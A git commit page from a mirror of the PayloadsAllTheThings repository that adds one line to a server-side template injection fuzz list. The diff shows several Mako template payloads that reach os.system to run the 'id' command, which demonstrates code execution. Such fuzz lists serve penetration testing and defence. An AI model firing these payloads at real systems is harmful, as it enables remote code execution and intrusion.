mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 15:14:34 +00:00
Update ssti.fuzz
This commit is contained in:
parent
039dae7c32
commit
dd875ffa32
1 changed files with 1 additions and 0 deletions
|
@ -51,3 +51,4 @@ ${self.module.runtime.util.os.system("id")}
|
|||
${self.template.module.cache.util.os.system("id")}
|
||||
${self.module.cache.compat.inspect.os.system("id")}
|
||||
${self.__init__.__globals__['util'].os.system('id')}
|
||||
${self.template.module.runtime.util.os.system("id")}
|
||||
|
|
Loading…
Reference in a new issue